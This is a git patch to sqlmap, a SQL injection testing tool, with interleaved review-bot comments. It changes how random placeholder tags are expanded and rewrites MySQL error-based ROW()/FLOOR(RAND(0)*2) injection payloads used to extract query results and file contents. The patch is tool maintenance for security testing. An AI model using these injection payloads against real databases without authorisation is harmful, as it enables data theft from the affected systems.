From 2538e2d5b4e1318d7741040d588569b9a798f6f0 Mon Sep 17 00:00:00 2001
From: Miroslav Stampar
Date: Tue, 22 May 2012 09:33:22 +0000
Subject: [PATCH] fixing an issue with --file-read and ROW() MySQL payload (it's internal caching mechanism prevents error message if FROM part is not unique enough dumping only partial file content); minor refactoring
---
 lib/controller/checks.py | 3 ---
 lib/controller/controller.py | 2 +-
 lib/core/agent.py | 24 +++++++++++++-----------
 lib/request/connect.py | 2 +-
 lib/request/direct.py | 2 +-
 xml/payloads.xml | 8 ++++----
 6 files changed, 20 insertions(+), 21 deletions(-)
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
index 749c9327e..d998524a2 100644
--- a/lib/controller/checks.py
+++ b/lib/controller/checks.py
@@ -488,9 +488,6 @@ def checkSqlInjection(place, parameter, value):
 if vector is None and "vector" in test and test.vector is not None:
 vector = "%s%s" % (test.vector, comment or "")
- if method == PAYLOAD.METHOD.TIME: reqPayload = reqPayload.replace(test.request.payload.replace("[SLEEPTIME]", str(conf.timeSec)), test.request.payload)
-
 injection.data[stype] = AttribDict()
 injection.data[stype].title = title
 injection.data[stype].payload = agent.removePayloadDelimiters(reqPayload)
diff --git a/lib/controller/controller.py b/lib/controller/controller.py
index 1dc4dd88b..e60db4a93 100644
--- a/lib/controller/controller.py
+++ b/lib/controller/controller.py
@@ -138,7 +138,7 @@ def __formatInjection(inj):
 title = title.replace("columns", "column")
 data += " Type: %s\n" % PAYLOAD.SQLINJECTION[stype]
 data += " Title: %s\n" % title
- data += " Payload: %s\n" % (sdata.payload if stype not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) else sdata.payload.replace("[SLEEPTIME]", str(conf.timeSec)))
+ data += " Payload: %s\n" % agent.adjustLateValues(sdata.payload)
 data += " Vector: %s\n\n" % vector if conf.verbose > 1 else "\n"
 return data
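Review bot: The `Vector:` line two lines below the changed `Payload:` line still prints `vector` raw, so with `conf.verbose > 1` a time-based entry would show the resolved sleep value in `Payload:` but the unresolved `[SLEEPTIME]` tag in `Vector:`, assuming the time-based vectors in payloads.xml carry that tag (not visible in this patch — confirm). Passing the vector through the same helper keeps the report self-consistent: `data += " Vector: %s\n\n" % agent.adjustLateValues(vector) if conf.verbose > 1 else "\n"`. Note that `adjustLateValues` is now applied to every technique, not only TIME/STACKED as before; that is harmless because it only touches the `[SLEEPTIME]` tag, but a short comment saying so would stop a reader from re-adding the technique check. `__formatInjection` starts outside the hunk.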
diff --git a/lib/core/agent.py b/lib/core/agent.py
index f76aa1934..90650e6df 100644
--- a/lib/core/agent.py
+++ b/lib/core/agent.py
@@ -212,20 +212,19 @@ class Agent:
 if payload is None:
 return
- randInt = randomInt()
- randInt1 = randomInt()
- randInt2 = randomInt()
- randStr = randomStr()
- randStr1 = randomStr()
-
 _ = (
- ("[RANDNUM]", str(randInt)), ("[RANDNUM1]", str(randInt1)), ("[RANDNUM2]", str(randInt2)), ("[RANDSTR]", randStr),\
- ("[RANDSTR1]", randStr1), ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
+ ("[DELIMITER_START]", kb.chars.start), ("[DELIMITER_STOP]", kb.chars.stop),\
 ("[AT_REPLACE]", kb.chars.at), ("[SPACE_REPLACE]", kb.chars.space), ("[DOLLAR_REPLACE]", kb.chars.dollar),\
 ("[HASH_REPLACE]", kb.chars.hash_)
 )
 payload = reduce(lambda x, y: x.replace(y[0], y[1]), _, payload)
+ for _ in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)): payload = payload.replace(_, str(randomInt()))
+ for _ in set(re.findall(r"\[RANDSTR(?:\d+)?\]", payload, re.I)): payload = payload.replace(_, randomStr())
+
 if origValue is not None:
 payload = payload.replace("[ORIGVALUE]", origValue)
@@ -249,12 +248,15 @@ class Agent:
 return payload
- def adjustSleepTime(self, payload):
+ def adjustLateValues(self, payload):
 """
- Returns payload with a replaced tag for SLEEPTIME
+ Returns payload with a replaced late tags (e.g. SLEEPTIME)
 """
- return payload.replace("[SLEEPTIME]", str(conf.timeSec)) if payload else payload
+ if payload:
+ payload = payload.replace("[SLEEPTIME]", str(conf.timeSec))
+
+ return payload
 def getComment(self, request):
 """
diff --git a/lib/request/connect.py b/lib/request/connect.py
index 235d582ca..5af77e395 100644
--- a/lib/request/connect.py
+++ b/lib/request/connect.py
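Review bot: The two new loops give every distinct `[RANDNUM…]` / `[RANDSTR…]` tag an independent draw, so two different tags can legally expand to the same value; the payloads this commit rewrites in payloads.xml build a derived table from `[RANDNUM2][RANDNUM3]`, `[RANDNUM4][RANDNUM5]` and `[RANDNUM6][RANDNUM7]` and, per the commit message, need that FROM part to be unique for the duplicate-entry error to fire, so the property the fix depends on is probabilistic rather than guaranteed. The `set(...)` does guarantee the other property those payloads rely on — repeated occurrences of one tag, as in `[RANDNUM]=[RANDNUM]`, expand to the same value — but no comment says so, and `_` is reused as both the substitution table and the loop variable, which hides that. I would remember the values already handed out and redraw on collision, with a comment stating both properties; the `RANDSTR` loop should follow the same pattern. The enclosing `payload` method starts and ends outside the hunk.
```python
            # One draw per distinct tag: repeated occurrences of a tag (e.g.
            # "[RANDNUM]=[RANDNUM]") must expand to the same value, while
            # different tags must not collide (the error-based payloads build
            # a derived table from them and rely on its rows being distinct).
            drawn = set()
            for tag in set(re.findall(r"\[RANDNUM(?:\d+)?\]", payload, re.I)):
                value = str(randomInt())
                while value in drawn:
                    value = str(randomInt())
                drawn.add(value)
                payload = payload.replace(tag, value)

            # … the [RANDSTR…] loop follows the same pattern with randomStr() …
```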
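Review bot: The new docstring `Returns payload with a replaced late tags (e.g. SLEEPTIME)` is ungrammatical and does not say why the substitution is deferred; suggest `Returns payload with late tags (e.g. [SLEEPTIME]) replaced; these are resolved at request time rather than when the payload is built`. The checks.py hunk this commit deletes used to swap the concrete `conf.timeSec` back for the tag before storing the payload, which suggests the intent is that a later change to `conf.timeSec` still reaches every stored payload — worth stating in the docstring once confirmed. The `if payload:` guard also means `None` or an empty string comes back unchanged, which the connect.py and direct.py callers pass straight through; a one-line note on that keeps someone from "tightening" it.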
@@ -540,7 +540,7 @@ class Connect:
 raise404 = place != PLACE.URI if raise404 is None else raise404
- value = agent.adjustSleepTime(value)
+ value = agent.adjustLateValues(value)
 payload = agent.extractPayload(value)
 threadData = getCurrentThreadData()
diff --git a/lib/request/direct.py b/lib/request/direct.py
index 99c099fc6..02724a039 100644
--- a/lib/request/direct.py
+++ b/lib/request/direct.py
@@ -28,7 +28,7 @@ from lib.utils.timeout import timeout
 def direct(query, content=True):
 select = True
 query = agent.payloadDirect(query)
- query = agent.adjustSleepTime(query)
+ query = agent.adjustLateValues(query)
 threadData = getCurrentThreadData()
 if Backend.isDbms(DBMS.ORACLE) and query.startswith("SELECT ") and " FROM " not in query:
diff --git a/xml/payloads.xml b/xml/payloads.xml
index 87bc7f186..f2e2f44c6 100644
--- a/xml/payloads.xml
+++ b/xml/payloads.xml
@@ -1215,9 +1215,9 @@ Formats:
 0 1 1
- AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)
+ AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)
- AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)
+ AND ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)
 [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]
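Review bot: The reason the FROM rows became concatenated tag pairs lives only in the commit message (MySQL's internal caching suppresses the duplicate-entry error when the FROM part is not unique enough, which truncated `--file-read` output), and nothing in the test entry records it, so a later cleanup can easily "simplify" `[RANDNUM2][RANDNUM3]` back to a single tag and silently reintroduce the bug. Suggest an XML comment inside the `<test>` element next to the vector, along the lines of `<!-- FROM rows are concatenated random tags on purpose: a FROM part that is not unique enough is served from MySQL's cache and the duplicate-entry error never fires (partial --file-read output) -->`. The same applies to the OR variant changed at line 1433, which is otherwise identical. Whether the three rendered rows are actually pairwise distinct is decided where the tags are expanded in agent.py, not in this file.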
@@ -1433,9 +1433,9 @@ Formats:
 2 1 2
- OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)
+ OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)
- OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM] UNION SELECT [RANDNUM1] UNION SELECT [RANDNUM2])a GROUP BY x)
+ OR ROW([RANDNUM],[RANDNUM1])>(SELECT COUNT(*),CONCAT('[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM (SELECT [RANDNUM2][RANDNUM3] UNION SELECT [RANDNUM4][RANDNUM5] UNION SELECT [RANDNUM6][RANDNUM7])a GROUP BY x)
 [DELIMITER_START](?P<result>.*?)[DELIMITER_STOP]